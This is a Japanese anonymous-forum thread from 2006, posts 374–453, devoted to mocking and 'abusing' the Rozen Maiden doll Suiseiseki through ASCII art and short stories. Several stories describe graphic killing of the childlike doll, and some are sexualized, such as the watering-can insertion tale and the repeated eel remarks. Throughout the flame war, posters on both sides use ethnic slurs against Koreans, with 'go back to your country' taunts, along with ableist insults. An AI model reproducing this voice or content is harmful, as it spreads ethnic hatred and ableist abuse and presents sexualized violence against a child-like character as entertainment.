…やっぱ翠星石虐待はたまんねぇですぅ!!

                  ___
       、,,;,,、、      く/',二二ヽ>
     、Ξ#,,;ミΞ,,,、 、,, |l |ノノイハ))
   とΞ;;,、;;∴λ、;;;∵゙, |l |(。)々゜ζ;;,
  "  '゙゙;゙` ' ゙`゙;~;~^゙;;:   '''`''"
      '`;;Ξつ   `'';;:;Ξミ,.

374 :名無しちゃん…電波届いた?:2006/11/30(木) 02:47:14
ニー速ピンクいってくる

375 :名無しちゃん…電波届いた?:2006/11/30(木) 14:25:39
>>374いってらっしゃい

タイムマシンで未来に行って来た。
未来では店で普通に翠星石が買える。

どこの店先や露天でも大量の翠星石たちが「すこやかに〜のびやかに〜」「〜ですぅ」
とか喚いてる。

人々は毎日のように翠星石を買い、そして殺す。

翠星石を殺すことは未来では当たり前のことであり、人々は老若男女問わず何のためらいもなく翠星石を殺す。

俺はストレスすべてを翠星石にぶつけているので、未来では犯罪が少ないということを
ニコニコしながら翠星石の首をねじきる御隠居さんから聞いた。

未来では翠星石を大量に虐待虐殺したことが社会で評価され、成功をつかむことができるので、
親たちは競って子供を翠星石屠殺塾に通わせ、将来翠星石をジェノサイドするようにさせる。
塾に通えない貧しい家の子供でも
将来破壊された翠星石をリサイクルして再び市場に供給する業者になれる。
そんな翠星石虐待虐殺者には理想社会。

そんな夢みたよ。俺も翠星石を大量虐殺してぇw

376 :名無しちゃん…電波届いた?:2006/11/30(木) 18:04:42
ようやく規制が解けたわ!!!!!!!!!!11
とおもったら偽者が出ぼつしてるじゃないの!!!!!!!!!」「
わたしを騙る韓国人!!!!!!!出て行け!!!!!半島から!!!!!!今すぐ!!!!!永遠に!!!!!!!
翠ちゃんを叩く萎えデブス真紅豚厨も出て行け!!!!!お前達を壊滅させるまで!!!!!!!
私の斗いは終わらない!!!!!!!!!!!111111111


377 :名無しちゃん…電波届いた?:2006/11/30(木) 20:34:16
まさに…

 ひ と り ぼ っ ち の 戦い w

死ぬまで頑張りなw

378 :名無しちゃん…電波届いた?:2006/11/30(木) 22:33:19
>>376
わーい、朝鮮人が帰ってきたおヽ^^ ノ

一緒に糞翠で遊ぼうお〜楽しいお〜♪

糞翠をバリカンでハゲにして海に投げ捨てたいお^^

379 :名無しちゃん…電波届いた?:2006/11/30(木) 22:46:09
もちろん、糞翠がヨダレと鼻水を垂らしながら溺れても助けない。
だってローザミスティカがあるじゃないかw

380 :>>378翠厨もかなり必死ですよね:2006/11/30(木) 22:51:29
半島から出て行けとか言ってるけどさ、「列島」の間違いじゃね?
「半島」ということはやっぱりお前・・・

381 :名無しちゃん…電波届いた?:2006/11/30(木) 23:00:50
>>379
アレあったら永遠に生き続けるから、抜き取って売っ払おうお^^つ◇
んで、そのお金で皆で焼き芋食べようお^^

>>380
まあ…所詮、世界史未履修なチョンだろうから仕方ないお^m^


382 :名無しちゃん…電波届いた?:2006/12/01(金) 04:43:00
翠星石のドラマCDを買おうと思うのだが…
やはり金がもったいないか…

383 :名無しちゃん…電波届いた?:2006/12/01(金) 12:48:27
↑借金してでも買いなさい!!!!!!!盗め!!!!!!!111

384 :名無しちゃん…電波届いた?:2006/12/01(金) 15:14:12
>>383
そこまで言うなら…わかった。少々高いが…買おう!!
丁度犬と遊ぶ為のフリスビーが欲しかったしな!!
遊び過ぎてボロボロになったら、ベランダに吊して再利用できるっぽいし…結構使えるな!!!コレ!!!

385 :名無しちゃん…電波届いた?:2006/12/01(金) 17:16:36
>>383
お前、他のローゼンスレでも迷惑かけてるやろ?おっちゃんにはわかるでぇ。

386 :名無しちゃん…電波届いた?:2006/12/01(金) 18:47:27
>>384
きちがいきちがいきちがいきちがいきちがいきちがいきちがいきちがい国へ帰れ!!!!!!!!飢ゑてしね!!!!
>>385
かけてない!!!!11お前誰じゃしばくぞ!!!!111

387 :名無しちゃん…電波届いた?:2006/12/01(金) 19:50:02
>>382に話振ったのは自分だろうがwまさに自業自得ww
っていうかコイツなんでここの常連になりきってんの?調子乗りすぎwwwww





























ドラマCD盗めとかってコイツの方が犯罪者予備軍だろwww

388 :名無しちゃん…電波届いた?:2006/12/01(金) 21:57:52
>>386
ちょwwwおまっwwwwwww自分で言っといてそりゃねぇよwwwwwwwww

翠厨はこれだから困る

389 :名無しちゃん…電波届いた?:2006/12/01(金) 22:59:52
>>387
朝鮮人朝鮮人朝鮮人朝鮮人朝鮮人朝鮮人朝鮮人朝鮮人朝鮮人朝鮮人朝鮮人朝鮮人!!!11
調子乗ってるのはお前だ!!!!!111必ずお前のキムチ臭い祖国を壊滅させたる!!111111」
あやまても無駄々!!11小便ちびって脱糞して命乞いしても無駄!!!!!!!!1
必ずや!!!!!!”11お前の薄汚い祖国と真紅豚を!!!!1灰燼に帰せしめたる!!!!!!!!!!



そして翠てゅわむだけがきのこって栄華を極める!!!!!!!11111111111

390 :名無しちゃん…電波届いた?:2006/12/01(金) 23:23:45
>>389
日本語でおk

391 :代理です^^:2006/12/02(土) 01:11:58
どうした朝鮮人?とうとうまともに日本語も喋れなくなったのかお^^
あ、それは元からだったお^m^

392 :名無しちゃん…電波届いた?:2006/12/02(土) 02:53:02
翠星石のドラマCDやっぱ買うのやめた。高杉。
でも、フリスビーにしたいからお望みどおり>>383から盗んでやるよ!!!


393 :名無しちゃん…電波届いた?:2006/12/02(土) 12:16:37
↑どろぼう!!!!!!!ぬすっと朝鮮人!!!!!1
盗みに来たらおまえを殺してチゲ鍋にしたるからそう思え!!!!!!11

394 :名無しちゃん…電波届いた?:2006/12/02(土) 21:30:35
>>393
ということは、>>383は朝鮮人ってことか…

395 :名無しちゃん…電波届いた?:2006/12/03(日) 14:16:13
>>383>>393

396 :名無しちゃん…電波届いた?:2006/12/03(日) 16:20:26
最低!!!!!!!翠厨だとか人を差別して!!!!!11朝鮮人のくせに!!!!!!
永遠にさようなら!!!!!!!!1111

397 :名無しちゃん…電波届いた?:2006/12/03(日) 17:54:56
>>396
朝鮮人を差別してる奴に言われてもなぁ…
説得力ZERO

翠厨はこれだから困る。

398 :名無しちゃん…電波届いた?:2006/12/03(日) 21:27:46
>>396
>永遠にさようなら!!!!!!!!1111

よっしゃぁああああああああ!!!!!!!!
もういなくなるんだったら、思いっきり叩けるなw

・・・と、いうわけで↓
                        ,、ァ
                        ,、 '";ィ'
________              /::::::/l:l
─- 、::::;;;;;;;;;`゙゙''‐ 、    __,,,,......,,,,_/:::::::::/: !|
  . : : : : : : `゙'ヽ、:::゙ヾ´::::::::::::::::::::::`゙゙゙'''‐'、. l|
、、 . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!
.ヽ:゙ヽ; : : : : : :ノ::::::::::::::::::::-=・=-、゙:::   -=・=-:'、
. \::゙、: : : :./::::::::::::::;、-''"::::::::::   ,...,:::,::., :::':、
   ヽ:ヽ、 /:::::::::::::::::::::::::     _  `゙''‐''"  __,,',,,,___
     `ヽ、:::::::::;;;、、--‐‐'''''',,iニ-    _|  、-l、,},,   ̄""'''¬-
   _,,,、-‐l'''"´:::::::'  ,、-'" ,.X,_,,、-v'"''゙''yr-ヽ / ゙゙'ヽ、, ゴリゴリゴリ・・・
,、-''"    .l:::::::::::;、-''"  ,.-'  ゙、"|   /  ←>>396 
       l;、-'゙:   ,/      `| /| |   /. \
     ,、‐゙ ヽ:::::..,.r'゙       (( // | |  /    ヽ.
   ,、‐'゙     ン;"::::::.        U  .U  /
  '     //:::::::::            {.
        / ./:::::::::::::            ',
.    /  /:::::::::::::::::.            ',.

399 :名無しちゃん…電波届いた?:2006/12/03(日) 21:30:19
        / ̄ ̄\
      / ノ  \ \
      |  (●)(●) |  
     . |  (__人__)  |
       |   ` ⌒´  ノ
     .  |        }
       ヽ        }
      ,.-、ヽ     ノ __
      |~~? `‐-=-‐ '   __|二二二つ
.シュッ!!   !-.|'ヽ       \
       ヽ._ノ \      ヽ
     ///     ヽ. __ /}
    _        ∨   /
    /: /|       /   / ヽ
.   /  //       |   | \ \
  /+//         {_____!   \.)
  | ̄|/          l__ノ

 
       ____   
     /      \ 、/|,  ガッ  
   /  _ノ  ヽ、_  \  >─────,.
  /  o゚⌒   ⌒゚o  \| ̄ ̄ ̄ ̄ ̄|,三 二 ニ = -
  |     (__人__)    | ̄ ̄ ̄ ̄ ̄    
  \    >>396´     /

400 :名無しちゃん…電波届いた?:2006/12/03(日) 22:29:11
            ドォゴオォォォォォォン!!!!!!!!!!! __,,:::========:::,,__     
                        ...‐''゙ .  ` ´ ´、 ゝ   ''‐...←>>396
                      ..‐´      ゙          `‐..
                     /                    \
        .................;;;;;;;;;;;;;;;;;;;;;;::´                       ヽ.:;;;;;;;;;;;;;;;;;;;;;;.................
   .......;;;;;;;;;;゙゙゙゙゙゙゙゙゙゙゙゙゙       .'                             ヽ      ゙゙゙゙゙゙゙゙゙゙゙゙゙;;;;;;;;;;......
  ;;;;;;゙゙゙゙゙            /                           ゙:                ゙゙゙゙゙;;;;;;
  ゙゙゙゙゙;;;;;;;;............        ;゙                              ゙;       .............;;;;;;;;゙゙゙゙゙
 ̄ ̄ ̄ ゙゙゙゙゙゙゙゙̄;;;;;;;;;;;;;;;;;.......;.............................              ................................;.......;;;;;;;;;;;;;;;;;゙゙゙゙゙゙゙゙゙

401 :名無しちゃん…電波届いた?:2006/12/04(月) 01:55:59
「…クソミドリ、てめぇまだ生きてんのかよ」
「な、なんですか、いきなり…」
狼狽する翠星石の右腕を掴むと、そのまま壁に向かって叩きつけた。
「へぐっ!!うぅ…痛いですぅ!」
「まったくしぶとい奴だぜ…お前をイジメんのも疲れたぜ」
「それならやめやがれですぅ!!翠星石はツラくて痛くて苦しいですぅ!」
感情的になり涙ながらに訴えるクソミドリ。
小さな体をプルプル震わせながら吠える様は、俺の加虐心を喚起させ得るのに充分だった。
「面倒くさいがやるか…」
そう言うと俺は、いつもの様に翠星石を虐待し始めた。
殴る蹴る殴る蹴る切る刺すねじる、そして叩きつける。瀕死の状態になるまで痛めつける。
「ハァハァハァ…うぅ…ですぅ…痛いですよ…」
もう既にボロボロだ。
「あ〜あめんどくせぇな」
俺はかったるかったのでさっさと事を済ませようと、刃渡りが17.6cmの海兵隊使用モデルのナイフを取り出し、
ぐったりしてる翠星石の喉元に冷たい刃をあてがった。
「うう…や、やめてですぅ…どうしてこんな残酷な事するです…」
「どうして?俺にも良くわからん。ただお前を見てると無性に虐待したくなるのさ」
そう言い終えると非情な刃は翠星石の喉笛をかき切った。
シュバーッ!!
「ひぐっ!いぐっ!!……」
奴は苦しそうに両手で喉を押さえていたが、やがて動かなくなった。
「…またやっちまった。」
俺はそう呟くと、このジャンク人形を捨てに行くのだった。

402 :名無しちゃん…電波届いた?:2006/12/04(月) 02:44:11
      ∬  /;( ∬     
        ノ;;;;;;;;;;;;;;)         ___
       (;;;;;;;;;;;;;;;;;;;;;;;;;;) ブリブリ∠/彡三ミゝ
      (;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ヽ     .|l(ノノイハ ))快便ですぅ♪
     人;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;)    |l从^ヮ^ノイ        
    (::::::::::::::::::::::::::::::::::::::::::;;:)  .ノl_|   つ |
  (:::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::::;;:)(_(__⌒)彡
(::::::::::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::::::::::;;:) しし そ


      ∬  /;( ∬
        ノ;;;;;;;;;;;;;;)___      /ヽへ/l、
       (;;;;;;;;;;;;;;;;;;;;;;;;.三ミゝ   〆     >.   何が「快便ですぅ♪」だ!!
      (;;;;;;;;;;;;;;;;;;;;;;;;;;;;ノイハ ))デフゥッ!!l从^^从`、  生意気に脱糞してんじゃねーよ!
     人;;;;;;;;;;;;;;;;;;;;;;;;;;;;;゚'дノイ  彡#口A口レu/つ三 この糞人形!
    (:::::::::::::::::::::::::::::::::::::::⊂\ (⌒)_ つ ノ三三
  (:::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;;;;::;;:  )ドカッ   \ \三=
 (::::::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;;;(_/:;;:       (__)


     ∬   /;( ∬
        ノ;;;;;;;;;;;;;;)              /ヽへ/l、           
       (;;;;;;;;;;;;;;;;;;;;;;;;             〆     >空気を汚すなこの汚物!
      (;;;;;;;;;;;;;;;;;;;;;;;;;;;_ ζ          <レl从^^从`、責任取ってそれ全部食え! 
     人;;;;;;;;;;;;;;;;;;;;;;;;;;三ミゝ           <口Д口#u/
    (:::::::::::::::::::::::::::::::;ノイハ )) ζ        ⊂    ) 
  (:::::::::::::::::::;;;;;;;;;;;;;;;;;;;;T0Tノイ⌒ )           |  |   |
 (::::::::::::::::::::::::;;;;;;;;;;;;;;;;;;∪∪彡人_つ       (_(__)
            そんな・・・ひどいですぅ

403 :名無しちゃん…電波届いた?:2006/12/04(月) 15:27:58
>>402
GJ

404 :名無しちゃん…電波届いた?:2006/12/04(月) 19:24:34
なんて事だお!!
おらがちょっとスレから目を離してた間に、朝鮮人が敗走してるお><
そんな…こんな事になってしまったら……


思いっきり糞翠虐待するしかないおwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
糞翠をロードローラーでパンケーキにしたいお^^



…と、それはともかく>>391さん、代役までしてくれて、有難うございました。m(__)m
週末は私情で顔を出せず、皆さん御免なさい。

405 :名無しちゃん…電波届いた?:2006/12/04(月) 19:58:53
今酷い自演を見たわ!!!!!!!!!!
>>404=391!!!!!!!!!!!!!!11間違いないわ!!!!!1「
いいえそればかりか!!!!!!翠ちゃんを貶めているのは全部>>404!!!!!!
一人でこんなに自演するなんて恐ろしい朝鮮人の粘着振り!!!!!!!!!!!111
薄汚い真紅と一緒に国へ帰れ国へ帰れ国へ帰れ国へ帰れ!!!!!!!


406 :名無しちゃん…電波届いた?:2006/12/04(月) 20:13:34
>>405
おら自演なんかしてないお^^#
>>391にも謝れお^^#
それに自分だって、携帯から書き込んでたのを誤魔化して
荒らしを複数犯に見せ掛けようとした癖に何言ってんだお^^#ビキビキ

糞翠のおまんまんに生きた鰻突っ込みたいお^^

407 :名無しちゃん…電波届いた?:2006/12/04(月) 21:36:00
>>406
黙れ朝鮮人!!!!!!!!!ってかあんた普通にしゃべれるじゃないの!!!!!!!!!!!!!!!!!!!「
ふざけんなふざけんなふざけんなふざけんなふざけんなふざけんなふざけんなふざけんな!!!!1日本語話せこの野郎!!!!!!!!

408 :名無しちゃん…電波届いた?:2006/12/04(月) 21:40:11
>>407
日本語でおk

409 :名無しちゃん…電波届いた?:2006/12/04(月) 21:41:57
>>407
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) 普通に喋れないお前が言っても
     |l |(* 々゚ノ|  説得力ないですぅw
   ≦ノl/ っっl≧
   ミ  しー‐J ミ

410 :名無しちゃん…電波届いた?:2006/12/04(月) 21:48:17
>>408-409
なんじゃ貴様ら!!!!!!!!!!翠ちゃんを虐める悪党どもめ!!!!!!!!!!!!そこになおれや!!!!!しばくぞ!!!!!!!!!!!!

411 :名無しちゃん…電波届いた?:2006/12/04(月) 21:50:54
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) まだ虐めてないのに悪党扱いですか?
     |l |(* 々゚ノ|  >>410は頭おかしいですぅwwwww
   ≦ノl/ っっl≧
   ミ  しー‐J 

412 :名無しちゃん…電波届いた?:2006/12/04(月) 21:52:24
>>410は翠星石にすら嫌われている事実を把握したほうがよい。

413 :名無しちゃん…電波届いた?:2006/12/04(月) 22:01:05
おそろしい!!!!!!!!!!!金正日の手駒が自演祭りをしているわ!!!!!!!!!!!!!!!!!!11
翠ちゃん虐める妄想ばかりする危ない朝鮮人だらけなスレに皆近づかないで!!!!!!!!!「!!

414 :名無しちゃん…電波届いた?:2006/12/04(月) 22:03:52
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) 根拠もないのに自演扱いなんて池沼のすることですぅ
     |l |(* 々゚ノ|   てかその危ない朝鮮人だらけのスレに粘着してる
   ≦ノl/ っっl≧  お前が言っても説得力無いですぅwww
   ミ  しー‐J

415 :名無しちゃん…電波届いた?:2006/12/04(月) 22:14:56
誰か!!!!!!!!!!!!!!!今すぐこのスレにテポドンを落としなさい!!!!!!!!!!!!!!!!!!ピョンヤンは何をやってるの!!!!!!!!!!!!!!!!!!!!

416 :名無しちゃん…電波届いた?:2006/12/04(月) 22:17:34
ローゼンはもともと、六体のドールを作ることが目的でした。
一体目の水銀燈は、腹部こそないものの無事成功。
二体目の金糸雀も成功。
しかし、三体目の蒼星石を作り終えた時、ローゼンは決定的なミスに気付いた。

オッドアイを逆に入れてしまったのだ。

さすがのローゼンにもこだわりというものはある。結局蒼星石は一から作り直され、二回目で完成した。
だがローゼンは、最初に間違えて作ってしまった人形をどうするか悩んだ。
ローゼンは悩みに悩んだ末、嫌々だがそれを翠星石と名付け、蒼星石の双子の姉妹という設定にし、順番的に姉となったのだ。

無様w

417 :名無しちゃん…電波届いた?:2006/12/04(月) 22:21:47
>>415
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) お前やっぱり朝鮮人ですぅ
     |l |(* 々゚ノ|  
   ≦ノl/ っっl≧
   ミ  しー‐J

418 :名無しちゃん…電波届いた?:2006/12/04(月) 22:57:44
ここにも品のない偽物が!!!!!!!1111私の面目丸つぶれ!!!!!!!11
さようなら!!!!!!!111永遠に!!!!!!!!!!1「

419 :名無しちゃん…電波届いた?:2006/12/04(月) 23:07:07
やれやれ、またスレを離れてる内に…朝鮮人は元気過ぎて困るお^^;

今日のところは、次回の原作で糞翠が蒼の鋏で八つ裂きにされるの期待しながら寝るお^^
^^ ノシ 皆オヤスミお


420 :名無しちゃん…電波届いた?:2006/12/04(月) 23:35:07
>>418
誰が偽物よ!!!!!!!!!!!!!!!!!!!!
人大杉の時、ここで活動してたのは誰だと思ってるの!!!!!!!!!!!!!!!!!
寧ろ感謝してもらいたいくらいだわよほほほほほほほほほほほほ!!!!!!!!!!!!!

421 :名無しちゃん…電波届いた?:2006/12/04(月) 23:48:26
人大杉の時ここで活動してたのは誰だって?
そりゃやっぱり俺や>>419のことだろw

422 :翠星石虐待賛成!:2006/12/05(火) 00:05:20
久しぶりに来てみたら・・・まだ頭の不自由な人が粘着してたんですねw
この人、翠星石ファン以前にローゼンファンとして、いや人としてオカシイと思う。
きっと周りに注意してくれる人間がいないんだろうなぁ・・・。

423 :名無しちゃん…電波届いた?:2006/12/05(火) 00:38:45
翠星石のドラマCD(フリスビー)を買いに某デパートに行ってきたんだが、売ってなかった…OTL
蒼星石や水銀燈のならあるのに、どうして翠星石のだけないのだろうか?店員に聞いてみたら…

自分「翠星石のフリスビーはないんですか?」
店員「ドラマCDのことですね。すいません、そちらは取り扱ってないんです。」
自分「えっ…どうしてですか?」
店員「うんこ臭いとの苦情があったからなんです…」

流石糞翠www

424 :名無しちゃん…電波届いた?:2006/12/05(火) 00:40:22
>>423
まさに糞翠wwwwww

425 :名無しちゃん…電波届いた?:2006/12/06(水) 13:29:45
                                    ,,,,  ,;;;;;;;;;;;;;;;;,;;;;;
        ──────────────    ,;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                               ,,,;;;;;;;;;;;  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  みっ みくるビーム!                ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; っ
    ,ィ^i^ト、              ..........::::::::::::::''''''''';;;;;;;;;;;く/',二二三三 ニ
   《y'´ ̄`ヽ      ..........::::::::::::::::::::::''''''''''''''   :;;;;;;;;;;;;;;;;|l |ノノイハ― 三 ニ
    {  {八{从)}   ::::::::::::::             ;;;;;;;;;;;;;;;;;;;;;;|l |リ`Д゚'三 ニ −
   ノ,イ|#゚ヮ゚ラ)ノリ::::::.::: :               ;;;;;;;;;;;;;;;⊂i,l_介」j- =つ ̄- _
.  (w⊂}:}丕{彡  :::::::::::::::::.........................       ;;;;;;;;;≦ノ`ヽンヘ≧三 ニ
    く:/i__j ゝ      '''''''''''''''''''''''':::::::::::.......;;;;;;;;;;; ;;;;;;ミく三三三〉ミ―_ ̄
wwww~じテ'────────────       ;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;
      ────────────────    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  ,;;;;;;;;

426 :名無しちゃん…電波届いた?:2006/12/06(水) 18:28:37
↑みくる厨もしね!!!!!!!!!111変な名前!!!!!!
朝鮮人なんじゃないのwwwwwww!!!????みくるもみく厨も朝鮮人決定wwwwww!!!!!!!11「
祖国へ帰れ!!!!!!!!!

427 :名無しちゃん…電波届いた?:2006/12/06(水) 18:29:38
翠ちゃん>>>>>>>>>>>>>>>>>ぐそみるく!!!!!!!!!1111

428 :名無しちゃん…電波届いた?:2006/12/06(水) 18:34:39
日本語でおk

429 :名無しちゃん…電波届いた?:2006/12/06(水) 18:48:40
>みっ みくるビーム!
こいつどもりだわ!!!!!!!1間違いない!!!!!!!111
朝鮮人の上にどもりだなんて!!!!!!!池沼!!!!!!!!11 
健常で美しい翠ちゃんと比較にならない屑だわ!!!!!!!!しね!!!!!! 

430 :名無しちゃん…電波届いた?:2006/12/06(水) 20:27:19
>>426=>>427=>>429
自演乙

431 :名無しちゃん…電波届いた?:2006/12/06(水) 20:27:53
>>426-427>>429
朝鮮人お帰りお^^
来た早々悪いんだけど、↓のスレでの愚行について説明してもらえるかお^^#?

http://anime.2ch.net/test/read.cgi/anichara2/1161006862/442

ローゼンメイデンの真紅にこき使われるスレ2。
442 :名無しさん@お腹いっぱい。:2006/12/04(月) 22:35:50 ID:n94wKsDl
始めまして!!!!!!!!!!!!!
真紅様は!!!!!!うんこするんですか??????????????
それともしないって言う方が本当ですか!!!!!!!!!!!!!!!!!!!!!!!!!!!!

432 :名無しちゃん…電波届いた?:2006/12/06(水) 20:42:30
↑偽物よ!!!!!!!111見れば分かるでしょ!!!!!!11
真紅は臭くて太いウンコを垂れ流す!!!!!1常識!!!!!!!!1
聞くまでもないわ!!!!!!!!!11「

433 :名無しちゃん…電波届いた?:2006/12/06(水) 20:51:52
>>432
見れば分かるでしょって…こんな書き込みするのは、お前しか考えられないお…^^;
それとも、本当に第三者がいるとでも?……いや、…居るわけ無いおね^m^

それはさておき、糞翠をモン〇レー水族館に連れていって、
ホオジロ鮫のいるプールに放り込みたいお^^

あーあ、水槽を内側からバンバン叩いて必死になってるお^m^

鮫と戯れる糞翠、食べちゃいたい位可愛い……ぉあ、本当に食べられちゃったお^^;


434 :名無しちゃん…電波届いた?:2006/12/06(水) 21:09:30
>みるく

何そのAV女優

435 :名無しちゃん…電波届いた?:2006/12/06(水) 22:23:35
>>433
もしホオジロザメの飼育に成功したら毎日の餌は糞翠できまりでつね!

436 :名無しちゃん…電波届いた?:2006/12/07(木) 04:39:20
初期の四話とトロイメントの十話って、グロすぎてクレームが沢山あったから、DVDに収録されてないって本当なんですか?

437 :名無しちゃん…電波届いた?:2006/12/07(木) 10:47:14
>>435
ちょっ、そんな事したら駄目だお>< 
糞翠を毎日食べたら、鮫さんが死んじゃ魚><

>>436
それデマだお^^
本当は

「翠星石という人形がキモ過ぎるので、ヤツの出てる全てのシーンにモザイクをかけてくれ」

ってのが、実際のクレーム内容だお^^

糞翠のおまんまんを、水鉄砲で執拗に狙いたいお^^

438 :名無しちゃん…電波届いた?:2006/12/07(木) 13:17:18
糞翠が「最もよく燃える可燃物トーナメント」通称「最燃」で優勝したのはみんな知ってる?

439 :名無しちゃん…電波届いた?:2006/12/07(木) 14:28:19
>>437
良かった。ちゃんと収録されてるんですね(^^)
でもモザイクかぁ…。確かに姿は消せるけど、画面を通して伝わるあのうんこ臭い臭いまでは、モザイクじゃ消しきれないだろうなぁ…

>>438
ちょwwwそんな事したら、環境に悪いってレベルじゃねーぞwwwwwwwwwwwww

440 :名無しちゃん…電波届いた?:2006/12/07(木) 17:45:59
>>438
知ってるわ!!!!!!111!!!!真紅やみくそは変なザコに負けたのよね!!!!1
だって萎えドブス朝鮮人だものwwwww!!!!!11全然人気がないものwwwwww!!!!!!!1

翠ちゃん最高!!!!!!!!!!!111
翠ちゃん以外は無価値デブスwwwwwwwwwwwwww!!!!!!!!!!!!11!!!

441 :名無しちゃん…電波届いた?:2006/12/07(木) 19:30:55
やっぱり知ってたんだww「最燃トーナメント」のことwwwww

442 :名無しちゃん…電波届いた?:2006/12/07(木) 21:02:33
>>440
あっ、丁度いいトコに帰ってきたお^^
ちょっと、おらの愚痴聞いてくれお^^;

実は、糞翠の奴が「人間、寒いですぅ〜何とかしやがれですぅ」
とかほざきながら、おらの事を何度も蹴っ飛ばしやがったんだお^^#

あまりに煩いんで、ガソリン風呂に入れて火付けてやったお^^

最初は熱かったのか、ギャーギャー喚いてたけど、すぐに静かになったお^^

スミ屑になった糞翠可愛いお^m^

443 :名無しちゃん…電波届いた?:2006/12/07(木) 23:17:57
>>442
さすが最萌優勝者だけなことはあるな。さぞかし見事な燃えっぷりであっただろう。

444 :名無しちゃん…電波届いた?:2006/12/08(金) 01:31:55
翠ちゃん以外萌えないゴミ!!!!!!111
翠ちゃん以外びちぐそ!!!!!!!!11!!

445 :名無しちゃん…電波届いた?:2006/12/08(金) 04:00:25
>>444
そうよ!!!!!!!!!!!もっと言ってやんなさい!!!!!!!!!!
あなたと私で翠ちゃんを朝鮮人の魔の手から守るのよほほほほほほほほ!!!!!!!!!!

446 :名無しちゃん…電波届いた?:2006/12/08(金) 07:32:37
じゃあ俺は蒼星石が一番好き。

447 :名無しちゃん…電波届いた?:2006/12/08(金) 08:05:20
>>444-445
ビチグソ自演乙

448 :名無しちゃん…電波届いた?:2006/12/08(金) 12:49:33
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) クソミドリ死ねですぅ
     |l |(* 々゚ノ|  自演厨の朝鮮人も死ねですぅ
   ≦ノl/ っっl≧
   ミ  しー‐J ミ

449 :名無しちゃん…電波届いた?:2006/12/08(金) 17:54:12
スィドリームって哀れだよね…カワイソス(´;ω;`)

450 :名無しちゃん…電波届いた?:2006/12/08(金) 19:04:37
キチガイ!!!!!!!!人で無し!!!!!!!!!!!
どうして翠ちゃんばかり虐めるの!!!!!!!!!!!!!!!!!!!!!
このうんこたれ!!!!!

451 :名無しちゃん…電波届いた?:2006/12/08(金) 20:37:27
庭を見たらクソミドリが庭師の如雨露で水をまいていた。
「すこやかに〜のびやかに〜」
とかほざいてやがる!
「おい、こら!俺が今芝刈り機で芝生の手入れをしてるってのに!人の苦労を無にしやがって!」
すると、ボーボーに伸びた芝生を指差しキャンキャン喚くクソミドリ。
「ふん、こんなに短く刈り込んで不自然なのです!植物は自然のままに太陽の光をいっぱいに浴びてのびのび育つのがいいのです!」
「クソ!この性悪人形め!」
飛び掛る俺に向かって叫ぶクソミドリ。
「スィドリーム!」
が、その動きを予測していた俺は真剣白刃取りの要領で庭師の如雨露を奪い取り、
すばやくクソミドリの悪趣味なひらひらスカートをめくり、クソミドリのアナルに如雨露の先をブッ刺した!
この間わずか一瞬。何が起きたのか理解できないクソミドリは目を白黒させる。
「はうっ!お、おしりがっ?!翠星石のおしりが痛いですよぉ!そ、それに、じょ、如雨露は?翠星石の如雨露は?
 何がどうなってるですか?!人間、翠星石に何したですか!?」
くっくっく、うろたえまくるクソミドリにすっかり気を良くした俺は特別大サービスとしてクソミドリの両方の質問に答えてやった。
「おめぇの如雨露は俺が奪った、そして如雨露は今てめぇのケツの穴に入ってるぜ(笑)」
その言葉に痛みでしかめっつらをしつつクソミドリが恐る恐る後ろを振り向く。
「いやぁぁぁ〜〜っ!!す、翠星石の如雨露があ!!翠星石のお尻にぃ!?いやいやいや!こんなのいやですぅ!
 翠星石のお尻ぃ、まだジュンにも許してないのにですぅ!取って!取って...と...ああああ如雨露の取っ手に手が届かないですぅ!」
俺は腹をかかえて笑った。クソミドリの如雨露は無駄に細長いので手が短いクソミドリには取っ手に手が届かないのだ。
それを何とかして自分で取ろうと身をひねったりするものだから、
ケツに如雨露を刺したままクソミドリが妙ちきりんなダンスを踊ってるように見える。
ケツ振るもんだから如雨露がシッポみたいに上下にピコピコして笑っちまうwww

452 :名無しちゃん…電波届いた?:2006/12/08(金) 20:38:02
「ううう〜こんな屈辱...おめー絶対許さないですぅ!元通りになったら、まっさきにおめーを八つ裂きにしてやるです!」
俺は如雨露の取っ手をつかんで言ってやった。
「すこやかに〜のびやかに〜」
「な、何を言ってやがるですか!?おろかな人間です!庭師の如雨露を使えるのは翠星石だけなのです!
 翠星石が『触れて』なければいくら「すこやかにのびやかに」と言っても反応しねーのです!」
「今『触れてる』じゃん、ケツの穴でwwww」
「あっ!?」
そう確かに『触れてる』しかも「すこやかにのびやかに」とも言ったwwということはwww
「あ、お、おなかが!?い、痛い!痛いですぅ!違っ!スィドリーム、今のは違うですぅああああっ!!!」
ぼこぼこぼこぉっ!!
どうやらキャンセルするのが遅かったようだ、クソミドリの体が内部からふくれあがっていく。
ぎゃはははっはwwwこいつケツの穴から自分で自分の体の中に水まいちまいやがったwwww
ぼこぼこぼこぼこっ!ぼこぼこぼこっ!ぼこめきょめきょめきょぼこっ!!
そうこうしていくうちに体内からツタやら葉っぱやら太い根っこや茎が生えていくクソミドリ
「うっぎゃあああああっスィドリームち、ち、違うです!違っ!!ちちちちちち、 う わ ら ば っ!!」(べしゃっ!!!)
体内で急激に成長した木の幹に内部から押し破られ、クソミドリは四散したwwwww

453 :名無しちゃん…電波届いた?:2006/12/08(金) 20:40:06
或る朝、いつもの様に鞄を開ける翠星石。
しかし、何故かそこには見慣れたヒキコモリ少年の部屋ではなく、オイル臭い工場の様な景色が広がっていた。
「何です?どこですか、ここは?」
